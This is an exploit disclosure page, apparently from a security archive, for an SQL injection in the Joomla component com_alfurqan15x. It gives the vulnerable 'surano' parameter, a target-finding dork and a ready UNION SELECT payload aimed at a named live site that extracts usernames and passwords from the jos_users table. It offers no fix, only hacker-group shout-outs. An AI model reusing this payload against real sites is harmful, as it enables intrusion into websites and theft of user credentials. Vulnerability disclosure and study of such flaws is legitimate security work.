Joomla Component com_alfurqan15x SQL injection

2010-11-15 / 2010-11-16
Credit: kaMtiEz
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

## Joomla Component com_alfurqan15x SQL injection ## ## Author : kaMtiEz (kamtiez@indonesiancoder.com) ## ## Homepage : http://www.indonesiancoder.com ## ## Date : 16 Nov, 2010 ## [ Software Information ] [+] Vendor : http://islamis4u.co.cc/ [+] Download : http://islamis4u.co.cc/index.php?option=com_rokdownloads&view=folder&Itemid=198&id=4%3Aal-furqan-1-5 [+] version : 2.2 or lower maybe also affected [+] Tested On : LocalHost [+] Vulnerability : SQL [+] Dork : "CiHuY" [+] LOCATION : INDONESIA - JOGJA ## [ Vulnerable File ] http://127.0.0.1/[kaMtiEz]/index.php?option=com_alfurqan15x&action=viewayat&surano=[BunciteRs] [ DEMO ] http://islamis4u.co.cc/index.php?option=com_alfurqan15x&action=viewayat&surano=-999.9+UNION+ALL+SELECT+1,concat_ws(0x3a,username,0x3a,password)kaMtiEz,3,4,5+from+jos_users-- [ FIX ] dunno :"> ## [ Thx TO ] [+] INDONESIAN CODER TEAM MainHack MAGELANG CYBER ServerIsDown SurabayaHackerLink IndonesianHacker MC-CREW IH-CREW [+] tukulesto,M3NW5,arianom,N4CK0,Jundab,d0ntcry,bobyhikaru,gonzhack,senot,Jack-,Hakz,pl4nkt0n,Hmei7 [+] Contrex,YadoY666,bumble_be,MarahMeraH,newbie_043,Pathloader,cimpli,MarahMerah.IBL13Z,r3m1ck,k4mpret0 [+] Coracore,Gh4mb4s,Jack-,vYcOd,ayy,otong,CS-31,yur4kh4,MISTERFRIBO,GENI212,anharku,isarock,RyanAby [ NOTE ] [+] WE ARE ONE UNITY, WE ARE A CODER FAMILY, AND WE ARE INDONESIAN CODER TEAM [+] Selamat Iedul Adha ;) [+] pondok buncit @ dejavuNet , ngebir is numero uno [+] sendiri di malam hari sambil merokok menanti indahnya pagi ;) [+] turut berduka atas musibah di negaraku .. :(( [ QUOTE ] [+] INDONESIANCODER still r0x [+] nothing secure ..


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top